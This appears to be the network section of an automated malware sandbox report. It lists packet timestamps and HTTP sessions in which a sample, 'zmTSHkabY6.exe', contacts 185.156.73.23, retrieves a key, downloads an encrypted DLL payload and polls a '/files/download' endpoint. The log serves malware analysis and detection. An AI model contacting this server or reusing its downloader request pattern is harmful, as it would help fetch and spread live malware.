                                                                  Dec 20, 2024 16:24:01.972903013 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.973022938 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.973067045 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.973247051 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.973429918 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.974124908 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.974154949 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.974783897 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.974909067 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.975169897 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.975418091 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.975995064 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.976036072 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.976067066 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.976084948 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.976130009 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.976543903 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.976599932 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.977161884 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.977757931 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.977788925 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.977814913 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.977946043 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.978344917 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.978394032 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.978861094 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.978899956 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.979275942 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.979305029 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.979347944 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.979357958 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.980112076 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.980158091 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.980195999 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.980195999 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.981040955 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.981070995 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.981090069 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.981112003 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.981791019 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.981807947 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.981981039 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.982528925 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.982590914 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.982630014 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.982676029 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.983567953 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.983584881 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.983620882 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.983676910 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.984530926 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.984555960 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.984594107 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.984622955 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.985395908 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.985416889 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.985459089 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.985459089 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.986175060 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.986198902 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.986229897 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.986632109 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.986860991 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.986908913 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.987360954 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.988017082 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.988034964 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.988039970 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.988500118 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:01.989022970 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:01.992544889 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.135951042 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.136205912 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.136235952 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.136286020 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.136286974 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.136306047 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.136332035 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.136379957 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.137176037 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.137299061 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.137376070 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.137419939 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.138035059 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.138178110 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.138206959 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.138345957 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.139130116 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.139370918 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.139532089 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.139906883 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.139926910 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.140043020 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.140609980 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.141196966 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.141277075 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.141488075 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.141539097 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.141875029 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.141920090 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.142390013 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.142493963 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.142550945 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.143254995 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.143330097 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.143696070 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.144109011 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.144217014 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.144520998 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.144898891 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.145215988 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.145272970 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.145322084 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.145777941 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.145813942 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.145909071 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.146682024 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.147325993 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.147365093 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.147435904 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.147492886 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.147550106 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.147713900 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.148406982 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.148504019 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.148550987 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.148550987 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.149203062 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.149946928 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.150074005 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.150074005 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.150321960 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.150386095 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.151299000 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.151361942 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.151376009 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.151830912 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.151869059 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.151921988 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.152277946 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.152333975 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.152822018 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.152870893 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.152991056 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.153561115 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.153793097 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.153826952 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.154407978 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.154455900 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.154959917 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.155083895 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.155297995 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.155535936 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.155597925 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.156151056 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.156234026 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.156290054 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.156440020 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.156996012 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.157558918 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.157628059 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.157628059 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.157967091 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.158258915 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.158315897 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.158798933 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.159060955 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.159115076 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.159697056 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.159755945 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.159976959 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.160397053 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.160511971 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.160578966 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.160845041 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.160898924 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.161351919 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.161585093 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.161652088 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.162220001 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.162625074 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.162733078 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.163067102 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.163120031 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.163364887 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.521912098 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.522291899 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.522381067 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.522569895 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.522654057 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.523135900 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.523247957 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.523562908 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.523580074 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.523617029 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.523694992 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.524349928 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.524386883 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.524714947 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.524818897 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.525312901 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.525330067 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.525374889 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.525374889 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.526088953 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.526104927 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.526149035 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.526149035 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.526854992 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.526896000 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.527718067 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.527734995 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.527791977 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.527918100 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.527970076 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.528877974 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.529125929 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.529212952 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.529253960 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.529685974 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.529701948 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.529725075 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.529746056 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.530471087 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.530527115 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.530783892 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.530844927 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.531248093 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.531352043 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.531645060 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.532078981 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:02.532146931 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:02.532188892 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:05.176039934 CET8049858185.156.73.23192.168.2.4
                                                                  Dec 20, 2024 16:24:05.176127911 CET4985880192.168.2.4185.156.73.23
                                                                  Dec 20, 2024 16:24:37.177823067 CET4985880192.168.2.4185.156.73.23
                                                                  • 185.156.73.23
                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  0 | 192.168.2.4 | 49747 | 185.156.73.23 | 80 | 2424 | C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 20, 2024 16:23:13.792112112 CET | 414 | OUT | GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: 1
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Dec 20, 2024 16:23:15.261161089 CET | 204 | IN | HTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 15:23:14 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Length: 1
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 30
                                                                  Data Ascii: 0
                                                                  Dec 20, 2024 16:23:15.277766943 CET | 388 | OUT | GET /dll/key HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: 1
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Dec 20, 2024 16:23:15.794322968 CET | 224 | IN | HTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 15:23:15 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Length: 21
                                                                  Keep-Alive: timeout=5, max=99
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                                                  Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                                                  Dec 20, 2024 16:23:15.801570892 CET | 393 | OUT | GET /dll/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: 1
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Dec 20, 2024 16:23:16.702380896 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 15:23:16 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                                  Content-Length: 97296
                                                                  Keep-Alive: timeout=5, max=98
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/octet-stream
                                                                  Dec 20, 2024 16:23:17.248137951 CET | 395 | OUT | GET /files/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: C
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Dec 20, 2024 16:23:17.788042068 CET | 203 | IN | HTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 15:23:17 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Length: 1
                                                                  Keep-Alive: timeout=5, max=97
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 30
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  1 | 192.168.2.4 | 49762 | 185.156.73.23 | 80 | 2424 | C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 20, 2024 16:23:19.921622992 CET | 395 | OUT | GET /files/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: C
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  2 | 192.168.2.4 | 49779 | 185.156.73.23 | 80 | 2424 | C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 20, 2024 16:23:26.077425003 CET | 395 | OUT | GET /files/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: C
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Dec 20, 2024 16:23:27.417140007 CET | 204 | IN | HTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 15:23:27 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Length: 1
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 30
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  3 | 192.168.2.4 | 49791 | 185.156.73.23 | 80 | 2424 | C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 20, 2024 16:23:31.632246971 CET | 395 | OUT | GET /files/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: C
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Dec 20, 2024 16:23:33.011713982 CET | 204 | IN | HTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 15:23:32 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Length: 1
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 30
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  4 | 192.168.2.4 | 49801 | 185.156.73.23 | 80 | 2424 | C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 20, 2024 16:23:35.167129040 CET | 395 | OUT | GET /files/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: C
